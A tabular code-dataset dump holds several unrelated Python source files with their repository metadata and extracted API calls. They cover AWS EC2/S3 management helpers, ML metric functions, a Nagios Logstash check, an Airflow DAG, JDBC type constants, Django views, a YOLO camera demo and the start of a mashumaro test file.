repo_name (string, 7-94 chars) | repo_path (string, 4-237 chars) | repo_head_hexsha (string, 40 chars) | content (string, 10-680k chars) | apis (string, 2-840k chars)
---|---|---|---|---|
Darkcybe/attack_range | modules/aws_service.py | b135251cc40e527e78e6e826759e421fb3834577 | import sys
import re
import boto3
from botocore.exceptions import ClientError
import uuid
import time
import yaml
import os
def get_instance_by_name(ec2_name, config):
    instances = get_all_instances(config)
    for instance in instances:
        str = instance['Tags'][0]['Value']
        if str == ec2_name:
            return instance

def get_single_instance_public_ip(ec2_name, config):
    instance = get_instance_by_name(ec2_name, config)
    return instance['NetworkInterfaces'][0]['Association']['PublicIp']

def get_all_instances(config):
    key_name = config['key_name']
    region = config['region']
    client = boto3.client('ec2', region_name=region)
    response = client.describe_instances(
        Filters=[
            {
                'Name': "key-name",
                'Values': [key_name]
            }
        ]
    )
    instances = []
    for reservation in response['Reservations']:
        for instance in reservation['Instances']:
            if instance['State']['Name'] != 'terminated':
                if len(instance['Tags']) > 0:
                    str = instance['Tags'][0]['Value']
                    if str.startswith(config['range_name'] + '-attack-range'):
                        instances.append(instance)
    return instances

def get_splunk_instance_ip(config):
    all_instances = get_all_instances(config)
    for instance in all_instances:
        instance_tag = config['range_name'] + '-attack-range-splunk-server'
        if instance['Tags'][0]['Value'] == instance_tag:
            return instance['NetworkInterfaces'][0]['PrivateIpAddresses'][0]['Association']['PublicIp']
def check_ec2_instance_state(ec2_name, state, log, config):
    instance = get_instance_by_name(ec2_name, config)
    if not instance:
        log.error(ec2_name + ' not found as AWS EC2 instance.')
        sys.exit(1)
    return (instance['State']['Name'] == state)

def change_ec2_state(instances, new_state, log, config):
    region = config['region']
    client = boto3.client('ec2', region_name=region)
    if len(instances) == 0:
        log.error('No attack range EC2 instances found to change state.')
        sys.exit(1)
    if new_state == 'stopped':
        for instance in instances:
            if instance['State']['Name'] == 'running':
                response = client.stop_instances(
                    InstanceIds=[instance['InstanceId']]
                )
                log.info('Successfully stopped instance with ID ' +
                         instance['InstanceId'] + ' .')
    elif new_state == 'running':
        for instance in instances:
            if instance['State']['Name'] == 'stopped':
                response = client.start_instances(
                    InstanceIds=[instance['InstanceId']]
                )
                log.info('Successfully started instance with ID ' + instance['InstanceId'] + ' .')
# def upload_file_s3_bucket(file_name, results, test_file, isArchive):
# region = config['region']
# s3_client = boto3.client('s3', region_name=region)
# if isArchive:
# response = s3_client.upload_file(file_name, 'attack-range-attack-data', str(test_file['simulation_technique'] + '/attack_data.tar.gz'))
# else:
# response = s3_client.upload_file(file_name, 'attack-range-attack-data', str(test_file['simulation_technique'] + '/attack_data.json'))
#
# with open('tmp/test_results.yml', 'w') as f:
# yaml.dump(results, f)
# response2 = s3_client.upload_file('tmp/test_results.yml', 'attack-range-automated-testing', str(test_file['simulation_technique'] + '/test_results.yml'))
# os.remove('tmp/test_results.yml')
def upload_file_s3_bucket(s3_bucket, file_path, S3_file_path, config):
    region = config['region']
    s3_client = boto3.client('s3', region_name=region)
    response = s3_client.upload_file(file_path, s3_bucket, S3_file_path)

def upload_test_results_s3_bucket(s3_bucket, test_file, test_result_file_path, config):
    region = config['region']
    s3_client = boto3.client('s3', region_name=region)
    response = s3_client.upload_file(test_result_file_path, s3_bucket, str(test_file['simulation_technique'] + '/test_results.yml'))
| [((25, 13, 25, 52), 'boto3.client', 'boto3.client', (), '', False, 'import boto3\n'), ((66, 13, 66, 52), 'boto3.client', 'boto3.client', (), '', False, 'import boto3\n'), ((105, 16, 105, 54), 'boto3.client', 'boto3.client', (), '', False, 'import boto3\n'), ((111, 16, 111, 54), 'boto3.client', 'boto3.client', (), '', False, 'import boto3\n'), ((59, 8, 59, 19), 'sys.exit', 'sys.exit', ({(59, 17, 59, 18): '(1)'}, {}), '(1)', False, 'import sys\n'), ((70, 8, 70, 19), 'sys.exit', 'sys.exit', ({(70, 17, 70, 18): '(1)'}, {}), '(1)', False, 'import sys\n')] |
KevinMichaelSchindler/pystacknet | pystacknet/metrics.py | bb723511787be6a0828d2ec5ef141fa76b80ef84 | # -*- coding: utf-8 -*-
"""
Created on Fri Aug 31 18:33:58 2018
@author: Marios Michailidis
metrics and method to check metrics used within StackNet
"""
from sklearn.metrics import mean_squared_error, mean_absolute_error, r2_score , mean_squared_log_error #regression metrics
from sklearn.metrics import roc_auc_score, log_loss ,accuracy_score, f1_score ,matthews_corrcoef
import numpy as np
valid_regression_metrics=["rmse","mae","rmsle","r2","mape","smape"]
valid_classification_metrics=["auc","logloss","accuracy","f1","matthews"]
############ classification metrics ############
def auc(y_true, y_pred, sample_weight=None):
    return roc_auc_score(y_true, y_pred, sample_weight=sample_weight)
def logloss(y_true, y_pred, sample_weight=None, labels = None):
    return log_loss(y_true, y_pred, sample_weight=sample_weight, labels = labels)
def accuracy(y_true, y_pred, sample_weight=None):
    return accuracy_score(y_true, y_pred, sample_weight=sample_weight)
def f1(y_true, y_pred, sample_weight=None):
    return f1_score(y_true, y_pred, sample_weight=sample_weight)
def matthews(y_true, y_pred, sample_weight=None):
    return matthews_corrcoef(y_true, y_pred, sample_weight=sample_weight)
############ regression metrics ############
def rmse(y_true, y_pred, sample_weight=None):
    return np.sqrt(mean_squared_error(y_true, y_pred, sample_weight=sample_weight))
def mae(y_true, y_pred, sample_weight=None):
    return mean_absolute_error(y_true, y_pred, sample_weight=sample_weight)
def rmsle(y_true, y_pred, sample_weight=None):
    return np.sqrt(mean_squared_log_error(y_true, y_pred, sample_weight=sample_weight))
def r2(y_true, y_pred, sample_weight=None):
    return r2_score(y_true, y_pred, sample_weight=sample_weight)
def mape(y_true, y_pred, sample_weight=None):
    y_true = y_true.ravel()
    y_pred = y_pred.ravel()
    if sample_weight is not None:
        sample_weight = sample_weight.ravel()
    eps = 1E-15
    ape = np.abs((y_true - y_pred) / (y_true + eps)) * 100
    ape[y_true == 0] = 0
    return np.average(ape, weights=sample_weight)
def smape(y_true, y_pred, sample_weight=None):
    y_true = y_true.ravel()
    y_pred = y_pred.ravel()
    if sample_weight is not None:
        sample_weight = sample_weight.ravel()
    eps = 1E-15
    sape = (np.abs(y_true - y_pred) / (0.5 * (np.abs(y_true) + np.abs(y_pred)) + eps)) * 100
    sape[(y_true == 0) & (y_pred == 0)] = 0
    return np.average(sape, weights=sample_weight)
"""
metric: string or class that returns a metric given (y_true, y_pred, sample_weight=None)
Currently supported metrics are "rmse","mae","rmsle","r2","mape","smape"
"""
def check_regression_metric(metric):
    if type(metric) is type(None):
        raise Exception ("metric cannot be None")
    if isinstance(metric, str) :
        if metric not in valid_regression_metrics:
            raise Exception ("The regression metric has to be one of %s " % (", ".join([str(k) for k in valid_regression_metrics])))
        if metric=="rmse":
            return rmse,metric
        elif metric=="mae":
            return mae,metric
        elif metric=="rmsle":
            return rmsle,metric
        elif metric=="r2":
            return r2,metric
        elif metric=="mape":
            return mape,metric
        elif metric=="smape":
            return smape,metric
        else :
            raise Exception ("The metric %s is not recognised " % (metric) )
    else : # custom metric is given
        try:
            y_true_temp=[[1],[2],[3]]
            y_pred_temp=[[2],[1],[3]]
            y_true_temp=np.array(y_true_temp)
            y_pred_temp=np.array(y_pred_temp)
            sample_weight_temp=[1,0.5,1]
            metric(y_true_temp,y_pred_temp, sample_weight=sample_weight_temp )
            return metric,"custom"
        except:
            raise Exception ("The custom metric has to implement metric(y_true, y_pred, sample_weight=None)" )
"""
metric: string or class that returns a metric given (y_true, y_pred, sample_weight=None)
Currently supported metrics are "auc","logloss","accuracy","f1","matthews"
"""
def check_classification_metric(metric):
    if type(metric) is type(None):
        raise Exception ("metric cannot be None")
    if isinstance(metric, str) :
        if metric not in valid_classification_metrics:
            raise Exception ("The classification metric has to be one of %s " % (", ".join([str(k) for k in valid_classification_metrics])))
        if metric=="auc":
            return auc,metric
        elif metric=="logloss":
            return logloss,metric
        elif metric=="accuracy":
            return accuracy,metric
        elif metric=="r2":
            return r2,metric
        elif metric=="f1":
            return f1,metric
        elif metric=="matthews":
            return matthews,metric
        else :
            raise Exception ("The metric %s is not recognised " % (metric) )
    else : # custom metric is given
        try:
            y_true_temp=[[1],[0],[1]]
            y_pred_temp=[[0.4],[1],[0.2]]
            y_true_temp=np.array(y_true_temp)
            y_pred_temp=np.array(y_pred_temp)
            sample_weight_temp=[1,0.5,1]
            metric(y_true_temp,y_pred_temp, sample_weight=sample_weight_temp )
            return metric,"custom"
        except:
            raise Exception ("The custom metric has to implement metric(y_true, y_pred, sample_weight=None)" )
| [((21, 11, 21, 69), 'sklearn.metrics.roc_auc_score', 'roc_auc_score', (), '', False, 'from sklearn.metrics import roc_auc_score, log_loss, accuracy_score, f1_score, matthews_corrcoef\n'), ((24, 11, 24, 81), 'sklearn.metrics.log_loss', 'log_loss', (), '', False, 'from sklearn.metrics import roc_auc_score, log_loss, accuracy_score, f1_score, matthews_corrcoef\n'), ((27, 11, 27, 70), 'sklearn.metrics.accuracy_score', 'accuracy_score', (), '', False, 'from sklearn.metrics import roc_auc_score, log_loss, accuracy_score, f1_score, matthews_corrcoef\n'), ((30, 11, 30, 64), 'sklearn.metrics.f1_score', 'f1_score', (), '', False, 'from sklearn.metrics import roc_auc_score, log_loss, accuracy_score, f1_score, matthews_corrcoef\n'), ((33, 11, 33, 73), 'sklearn.metrics.matthews_corrcoef', 'matthews_corrcoef', (), '', False, 'from sklearn.metrics import roc_auc_score, log_loss, accuracy_score, f1_score, matthews_corrcoef\n'), ((41, 11, 41, 75), 'sklearn.metrics.mean_absolute_error', 'mean_absolute_error', (), '', False, 'from sklearn.metrics import mean_squared_error, mean_absolute_error, r2_score, mean_squared_log_error\n'), ((47, 11, 47, 64), 'sklearn.metrics.r2_score', 'r2_score', (), '', False, 'from sklearn.metrics import mean_squared_error, mean_absolute_error, r2_score, mean_squared_log_error\n'), ((58, 11, 58, 49), 'numpy.average', 'np.average', (), '', True, 'import numpy as np\n'), ((70, 11, 70, 50), 'numpy.average', 'np.average', (), '', True, 'import numpy as np\n'), ((38, 19, 38, 82), 'sklearn.metrics.mean_squared_error', 'mean_squared_error', (), '', False, 'from sklearn.metrics import mean_squared_error, mean_absolute_error, r2_score, mean_squared_log_error\n'), ((44, 19, 44, 86), 'sklearn.metrics.mean_squared_log_error', 'mean_squared_log_error', (), '', False, 'from sklearn.metrics import mean_squared_error, mean_absolute_error, r2_score, mean_squared_log_error\n'), ((56, 10, 56, 52), 'numpy.abs', 'np.abs', ({(56, 17, 56, 51): '((y_true - y_pred) / (y_true + eps))'}, {}), '((y_true - y_pred) / (y_true + eps))', True, 'import numpy as np\n'), ((68, 12, 68, 35), 'numpy.abs', 'np.abs', ({(68, 19, 68, 34): '(y_true - y_pred)'}, {}), '(y_true - y_pred)', True, 'import numpy as np\n'), ((104, 24, 104, 45), 'numpy.array', 'np.array', ({(104, 33, 104, 44): 'y_true_temp'}, {}), '(y_true_temp)', True, 'import numpy as np\n'), ((105, 24, 105, 45), 'numpy.array', 'np.array', ({(105, 33, 105, 44): 'y_pred_temp'}, {}), '(y_pred_temp)', True, 'import numpy as np\n'), ((145, 24, 145, 45), 'numpy.array', 'np.array', ({(145, 33, 145, 44): 'y_true_temp'}, {}), '(y_true_temp)', True, 'import numpy as np\n'), ((146, 24, 146, 45), 'numpy.array', 'np.array', ({(146, 33, 146, 44): 'y_pred_temp'}, {}), '(y_pred_temp)', True, 'import numpy as np\n'), ((68, 46, 68, 60), 'numpy.abs', 'np.abs', ({(68, 53, 68, 59): 'y_true'}, {}), '(y_true)', True, 'import numpy as np\n'), ((68, 63, 68, 77), 'numpy.abs', 'np.abs', ({(68, 70, 68, 76): 'y_pred'}, {}), '(y_pred)', True, 'import numpy as np\n')] |
stdevel/nagios-plugins | check_logstash_pipeline.py | 5ea0e186fa6fdd0e70681c7fed02c6d46d50bbb5 | #!/usr/bin/env python
# coding=utf-8
# vim:ts=4:sts=4:sw=4:et
#
# Author: Hari Sekhon
# Date: 2017-11-24 21:10:35 +0100 (Fri, 24 Nov 2017)
#
# https://github.com/harisekhon/nagios-plugins
#
# License: see accompanying Hari Sekhon LICENSE file
#
# If you're using my code you're welcome to connect with me on LinkedIn
# and optionally send me feedback to help steer this or other code I publish
#
# https://www.linkedin.com/in/harisekhon
#
"""
Nagios Plugin to check a Logstash pipeline is online via the Logstash Rest API
API is only available in Logstash 5.x onwards, will get connection refused on older versions
Optional thresholds apply to the number of pipeline workers
Ensure Logstash options:
--http.host should be set to 0.0.0.0 if querying remotely
--http.port should be set to the same port that you are querying via this plugin's --port switch
Tested on Logstash 5.0, 5.1, 5.2, 5.3, 5.4, 5.5, 5.6, 6.0, 6.1
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
import traceback
srcdir = os.path.abspath(os.path.dirname(__file__))
libdir = os.path.join(srcdir, 'pylib')
sys.path.append(libdir)
try:
    # pylint: disable=wrong-import-position
    #from harisekhon.utils import log
    from harisekhon.utils import ERRORS, UnknownError, support_msg_api
    from harisekhon.utils import validate_chars
    from harisekhon import RestNagiosPlugin
except ImportError as _:
    print(traceback.format_exc(), end='')
    sys.exit(4)
__author__ = 'Hari Sekhon'
__version__ = '0.6'
class CheckLogstashPipeline(RestNagiosPlugin):
    def __init__(self):
        # Python 2.x
        super(CheckLogstashPipeline, self).__init__()
        # Python 3.x
        # super().__init__()
        self.name = 'Logstash'
        self.default_port = 9600
        # could add pipeline name to end of this endpoint but error would be less good 404 Not Found
        # Logstash 5.x /_node/pipeline <= use -5 switch for older Logstash
        # Logstash 6.x /_node/pipelines
        self.path = '/_node/pipelines'
        self.auth = False
        self.json = True
        self.msg = 'Logstash pipelines msg not defined yet'
        self.pipeline = None

    def add_options(self):
        super(CheckLogstashPipeline, self).add_options()
        self.add_opt('-i', '--pipeline', default='main', help='Pipeline to expect is configured (default: main)')
        self.add_opt('-d', '--dead-letter-queue-enabled', action='store_true',
                     help='Check dead letter queue is enabled on pipeline (optional, only applies to Logstash 6+)')
        self.add_opt('-5', '--logstash-5', action='store_true',
                     help='Logstash 5.x (has a slightly different API endpoint to 6.x)')
        self.add_opt('-l', '--list', action='store_true', help='List pipelines and exit (only for Logstash 6+)')
        self.add_thresholds()

    def process_options(self):
        super(CheckLogstashPipeline, self).process_options()
        self.pipeline = self.get_opt('pipeline')
        validate_chars(self.pipeline, 'pipeline', 'A-Za-z0-9_-')
        # slightly more efficient to not return the potential list of other pipelines but the error is less informative
        #self.path += '/{}'.format(self.pipeline)
        if self.get_opt('logstash_5'):
            if self.pipeline != 'main':
                self.usage("--pipeline can only be 'main' for --logstash-5")
            if self.get_opt('list'):
                self.usage('can only --list pipelines for Logstash 6+')
            if self.get_opt('dead_letter_queue_enabled'):
                self.usage('--dead-letter-queue-enabled only available with Logstash 6+')
            self.path = self.path.rstrip('s')
        self.validate_thresholds(simple='lower', optional=True)

    def parse_json(self, json_data):
        if self.get_opt('logstash_5'):
            pipeline = json_data['pipeline']
        else:
            pipelines = json_data['pipelines']
            if self.get_opt('list'):
                print('Logstash Pipelines:\n')
                for pipeline in pipelines:
                    print(pipeline)
                sys.exit(ERRORS['UNKNOWN'])
            pipeline = None
            if self.pipeline in pipelines:
                pipeline = pipelines[self.pipeline]
        self.msg = "Logstash pipeline '{}' ".format(self.pipeline)
        if pipeline:
            self.msg += 'exists'
            if 'workers' not in pipeline:
                raise UnknownError('workers field not found, Logstash may still be initializing' + \
                                   '. If problem persists {}'.format(support_msg_api()))
            workers = pipeline['workers']
            self.msg += ' with {} workers'.format(workers)
            self.check_thresholds(workers)
            if not self.get_opt('logstash_5'):
                dead_letter_queue_enabled = pipeline['dead_letter_queue_enabled']
                self.msg += ', dead letter queue enabled: {}'.format(dead_letter_queue_enabled)
                if self.get_opt('dead_letter_queue_enabled') and not dead_letter_queue_enabled:
                    self.warning()
                    self.msg += ' (expected True)'
            batch_delay = pipeline['batch_delay']
            batch_size = pipeline['batch_size']
            self.msg += ', batch delay: {}, batch size: {}'.format(batch_delay, batch_size)
        else:
            self.critical()
            self.msg += 'does not exist!'
if __name__ == '__main__':
    CheckLogstashPipeline().main()
| [((43, 9, 43, 38), 'os.path.join', 'os.path.join', ({(43, 22, 43, 28): 'srcdir', (43, 30, 43, 37): '"""pylib"""'}, {}), "(srcdir, 'pylib')", False, 'import os\n'), ((44, 0, 44, 23), 'sys.path.append', 'sys.path.append', ({(44, 16, 44, 22): 'libdir'}, {}), '(libdir)', False, 'import sys\n'), ((42, 25, 42, 50), 'os.path.dirname', 'os.path.dirname', ({(42, 41, 42, 49): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((53, 4, 53, 15), 'sys.exit', 'sys.exit', ({(53, 13, 53, 14): '(4)'}, {}), '(4)', False, 'import sys\n'), ((90, 8, 90, 64), 'harisekhon.utils.validate_chars', 'validate_chars', ({(90, 23, 90, 36): 'self.pipeline', (90, 38, 90, 48): '"""pipeline"""', (90, 50, 90, 63): '"""A-Za-z0-9_-"""'}, {}), "(self.pipeline, 'pipeline', 'A-Za-z0-9_-')", False, 'from harisekhon.utils import validate_chars\n'), ((52, 10, 52, 32), 'traceback.format_exc', 'traceback.format_exc', ({}, {}), '()', False, 'import traceback\n'), ((112, 16, 112, 43), 'sys.exit', 'sys.exit', ({(112, 25, 112, 42): "ERRORS['UNKNOWN']"}, {}), "(ERRORS['UNKNOWN'])", False, 'import sys\n'), ((121, 69, 121, 86), 'harisekhon.utils.support_msg_api', 'support_msg_api', ({}, {}), '()', False, 'from harisekhon.utils import ERRORS, UnknownError, support_msg_api\n')] |
rvacaru/airflow-training-skeleton | dags/mailsdag.py | 45fc6a8938d055b98c62c85b7c8085cb7d6f23ba | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Example DAG demonstrating the usage of the BashOperator."""
from datetime import timedelta
import datetime
import airflow
from airflow.models import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.python_operator import BranchPythonOperator
args = {
    'owner': 'Airflow',
    'start_date': airflow.utils.dates.days_ago(14),
}
dag = DAG(
    dag_id='exercise_weekday',
    default_args=args,
    schedule_interval='0 0 * * *',
    dagrun_timeout=timedelta(minutes=60),
)
dummy_last = DummyOperator(
    task_id='run_this_last',
    dag=dag,
    trigger_rule='one_success',
)
def print_weekday(**context):
    day = context["execution_date"].strftime('%a')
    print(day)
    return day
weekday_task = PythonOperator(
    task_id='weekday_task',
    python_callable=print_weekday,
    provide_context=True,
    dag=dag,
)
# optimize with try/except
weekday_person = {
    "Mon": "bob",
    "Tue": "joe",
    "Thu": "joe",
}
def define_oncall(**context):
    day = print_weekday(**context)
    try:
        task_id = weekday_person[day]
    except KeyError:
        return "ali"
    return task_id
branch_task = BranchPythonOperator(
    task_id='branch_task',
    python_callable=define_oncall,
    provide_context=True,
    dag=dag,
)
tasks = ["bob", "joe", "ali"]
for p in tasks:
    taski = DummyOperator(
        task_id=p,
        dag=dag,
    )
    branch_task >> taski
    taski >> dummy_last
weekday_task >> branch_task
| [((44, 13, 48, 1), 'airflow.operators.dummy_operator.DummyOperator', 'DummyOperator', (), '', False, 'from airflow.operators.dummy_operator import DummyOperator\n'), ((55, 15, 60, 1), 'airflow.operators.python_operator.PythonOperator', 'PythonOperator', (), '', False, 'from airflow.operators.python_operator import PythonOperator\n'), ((78, 14, 83, 1), 'airflow.operators.python_operator.BranchPythonOperator', 'BranchPythonOperator', (), '', False, 'from airflow.operators.python_operator import BranchPythonOperator\n'), ((34, 18, 34, 50), 'airflow.utils.dates.days_ago', 'airflow.utils.dates.days_ago', ({(34, 47, 34, 49): '(14)'}, {}), '(14)', False, 'import airflow\n'), ((88, 12, 91, 5), 'airflow.operators.dummy_operator.DummyOperator', 'DummyOperator', (), '', False, 'from airflow.operators.dummy_operator import DummyOperator\n'), ((41, 19, 41, 40), 'datetime.timedelta', 'timedelta', (), '', False, 'from datetime import timedelta\n')] |
speedplane/python-compat-runtime | appengine-compat/exported_appengine_sdk/google/storage/speckle/proto/jdbc_type.py | 743ade7e1350c790c4aaa48dd2c0893d06d80cee | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Python equivalent of jdbc_type.h.
Python definition of the JDBC type constant values defined in Java class
java.sql.Types. Since the values don't fall into the range allowed by
a protocol buffer enum, we use Python constants instead.
If you update this, update jdbc_type.py also.
"""
BIT = -7
TINYINT = -6
SMALLINT = 5
INTEGER = 4
BIGINT = -5
FLOAT = 6
REAL = 7
DOUBLE = 8
NUMERIC = 2
DECIMAL = 3
CHAR = 1
VARCHAR = 12
LONGVARCHAR = -1
DATE = 91
TIME = 92
TIMESTAMP = 93
BINARY = -2
VARBINARY = -3
LONGVARBINARY = -4
NULL = 0
OTHER = 1111
JAVA_OBJECT = 2000
DISTINCT = 2001
STRUCT = 2002
ARRAY = 2003
BLOB = 2004
CLOB = 2005
REF = 2006
DATALINK = 70
BOOLEAN = 16
ROWID = -8
NCHAR = -15
NVARCHAR = -9
LONGNVARCHAR = -16
NCLOB = 2011
SQLXML = 2009
| [] |
osabogal10/GestiREDBackend | GestiRED/views.py | 99aa3b01bd67910cc0f96751c88d0f4e83763392 | from django.http import HttpResponse
from django.core.mail import send_mail
import json
from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
from GestiRED.models import User
from GestiRED.models import QualityControl, Phase, Resource, ResourceType,PhaseType
from django.core import serializers
from django.db.models import Q
# Create your views here.
def index(request):
return HttpResponse("GestiRED app UP")
@csrf_exempt
def quality_review_notification(request):
if request.method == 'POST':
data = json.loads(request.body)
qualityControl_id = data["qualityControl_id"]
resource_name = data["resource_name"]
responsible_name = data["responsible_name"]
qualityControl = QualityControl.objects.get(pk=qualityControl_id)
user = qualityControl.responsible
send_mail('Revision Calidad',
'Recurso: ' + resource_name + '\n Observaciones: Se ha asignado para control de calidad a: ' + responsible_name,
'[email protected]',
[user.email],
fail_silently=False)
res = {"status": "Ok", "Content:": "Email enviado"}
return HttpResponse(json.dumps(res), content_type="application/json")
@csrf_exempt
def resources_filters(request):
    qs_json = {}
    if request.method == 'GET':
        phaseType = request.GET.get('phaseType')
        if phaseType != None : phaseType = phaseType.split(',')
        resourceType = request.GET.get('resourceType')
        if resourceType != None : resourceType = resourceType.split(',')
        responsible = request.GET.get('responsible')
        if responsible != None: responsible = responsible.split(',')
        labels = request.GET.get('labels')
        my_dict = {'phase__phaseType__in': phaseType,
                   'resourceType__in': resourceType,
                   'responsibles__in': responsible,
                   'labels__icontains': labels}  # Your dict with fields
        or_condition = Q()
        for key, value in my_dict.items():
            if value != None:
                or_condition.add(Q(**{key: value}), Q.AND)
        lp = set()
        lp = Resource.objects.filter(or_condition).all().distinct()
        data = list([res.json() for res in lp])
        qs_json = json.dumps({'objects': data})
    return HttpResponse(qs_json, content_type='application/json')
| [((14, 11, 14, 42), 'django.http.HttpResponse', 'HttpResponse', ({(14, 24, 14, 41): '"""GestiRED app UP"""'}, {}), "('GestiRED app UP')", False, 'from django.http import HttpResponse\n'), ((64, 11, 64, 66), 'django.http.HttpResponse', 'HttpResponse', (), '', False, 'from django.http import HttpResponse\n'), ((20, 15, 20, 39), 'json.loads', 'json.loads', ({(20, 26, 20, 38): 'request.body'}, {}), '(request.body)', False, 'import json\n'), ((24, 25, 24, 73), 'GestiRED.models.QualityControl.objects.get', 'QualityControl.objects.get', (), '', False, 'from GestiRED.models import QualityControl, Phase, Resource, ResourceType, PhaseType\n'), ((27, 8, 31, 38), 'django.core.mail.send_mail', 'send_mail', (), '', False, 'from django.core.mail import send_mail\n'), ((34, 24, 34, 39), 'json.dumps', 'json.dumps', ({(34, 35, 34, 38): 'res'}, {}), '(res)', False, 'import json\n'), ((56, 23, 56, 26), 'django.db.models.Q', 'Q', ({}, {}), '()', False, 'from django.db.models import Q\n'), ((63, 17, 63, 45), 'json.dumps', 'json.dumps', ({(63, 28, 63, 44): "{'objects': data}"}, {}), "({'objects': data})", False, 'import json\n'), ((59, 33, 59, 50), 'django.db.models.Q', 'Q', ({}, {}), '(**{key: value})', False, 'from django.db.models import Q\n'), ((61, 11, 61, 48), 'GestiRED.models.Resource.objects.filter', 'Resource.objects.filter', ({(61, 35, 61, 47): 'or_condition'}, {}), '(or_condition)', False, 'from GestiRED.models import QualityControl, Phase, Resource, ResourceType, PhaseType\n')] |
sipeed/python3-maix | ext_modules/_maix_nn/example/yolo2_camera.py | 9ced31b8f1c1e4ef93b6a57bbfced27ae9e3361e |
from maix import nn
from PIL import Image, ImageDraw, ImageFont
from maix import display, camera
import time
from maix.nn import decoder
def draw_rectangle_with_title(draw, box, disp_str, bg_color=(255, 0, 0, 255), font_color=(255, 255, 255, 255)):
    # draw = ImageDraw.Draw(img)
    font = ImageFont.load_default()
    font_w, font_h = font.getsize(disp_str)
    draw.rectangle((box[0], box[1], box[0] + box[2], box[1] + box[3]), fill=None, outline=bg_color, width=2)
    draw.rectangle((box[0], box[1] - font_h, box[0] + font_w, box[1]), fill=bg_color)
    draw.text((box[0], box[1] - font_h), disp_str, fill=font_color, font=font)
camera.config(size=(224, 224))
model = {
"param": "/root/models/yolo2_face_awnn.param",
"bin": "/root/models/yolo2_face_awnn.bin"
}
options = {
"model_type": "awnn",
"inputs": {
"input0": (224, 224, 3)
},
"outputs": {
"output0": (7, 7, (1+4+1)*5)
},
"mean": [127.5, 127.5, 127.5],
"norm": [0.0078125, 0.0078125, 0.0078125],
}
print("-- load model:", model)
m = nn.load(model, opt=options)
print("-- load ok")
print("-- read image")
w = options["inputs"]["input0"][1]
h = options["inputs"]["input0"][0]
# # img.show()
print("-- read image ok")
labels = ["person"]
anchors = [1.19, 1.98, 2.79, 4.59, 4.53, 8.92, 8.06, 5.29, 10.32, 10.65]
yolo2_decoder = decoder.Yolo2(len(labels), anchors, net_in_size=(w, h), net_out_size=(7, 7))
while 1:
    img = camera.capture()
    if not img:
        time.sleep(0.01)
        continue
    t = time.time()
    out = m.forward(img, quantize=True, layout="hwc")
    print("-- forward: ", time.time() - t )
    t = time.time()
    boxes, probs = yolo2_decoder.run(out, nms=0.3, threshold=0.5, img_size=(240, 240))
    print("-- decode: ", time.time() - t )
    t = time.time()
    for i, box in enumerate(boxes):
        class_id = probs[i][0]
        prob = probs[i][1][class_id]
        disp_str = "{}:{:.2f}%".format(labels[class_id], prob*100)
        draw_rectangle_with_title(display.get_draw(), box, disp_str)
    print("-- draw: ", time.time() - t )
    t = time.time()
    display.show()
    print("-- show: ", time.time() - t )
| [((21, 0, 21, 30), 'maix.camera.config', 'camera.config', (), '', False, 'from maix import display, camera\n'), ((40, 4, 40, 31), 'maix.nn.load', 'nn.load', (), '', False, 'from maix import nn\n'), ((13, 11, 13, 35), 'PIL.ImageFont.load_default', 'ImageFont.load_default', ({}, {}), '()', False, 'from PIL import Image, ImageDraw, ImageFont\n'), ((55, 10, 55, 26), 'maix.camera.capture', 'camera.capture', ({}, {}), '()', False, 'from maix import display, camera\n'), ((59, 8, 59, 19), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((63, 8, 63, 19), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((67, 8, 67, 19), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((75, 8, 75, 19), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((76, 4, 76, 18), 'maix.display.show', 'display.show', ({}, {}), '()', False, 'from maix import display, camera\n'), ((57, 8, 57, 24), 'time.sleep', 'time.sleep', ({(57, 19, 57, 23): '(0.01)'}, {}), '(0.01)', False, 'import time\n'), ((61, 26, 61, 37), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((65, 25, 65, 36), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((72, 34, 72, 52), 'maix.display.get_draw', 'display.get_draw', ({}, {}), '()', False, 'from maix import display, camera\n'), ((73, 23, 73, 34), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((77, 23, 77, 34), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n')] |
Fatal1ty/mashumaro | tests/test_metadata_options.py | f32acf98f7cc7cdf638b921fe3fde96bef4fbefb | from dataclasses import dataclass, field
from datetime import date, datetime, time, timezone
from pathlib import Path
from typing import Any, Dict, Optional, Union
import ciso8601
import pytest
from mashumaro import DataClassDictMixin
from mashumaro.exceptions import UnserializableField
from mashumaro.types import SerializationStrategy
from .entities import (
    MutableString,
    MyList,
    ThirdPartyType,
    TypedDictRequiredKeys,
)

def test_ciso8601_datetime_parser():
    @dataclass
    class DataClass(DataClassDictMixin):
        x: datetime = field(metadata={"deserialize": "ciso8601"})

    should_be = DataClass(x=datetime(2021, 1, 2, 3, 4, 5, tzinfo=timezone.utc))
    instance = DataClass.from_dict({"x": "2021-01-02T03:04:05Z"})
    assert instance == should_be

def test_ciso8601_date_parser():
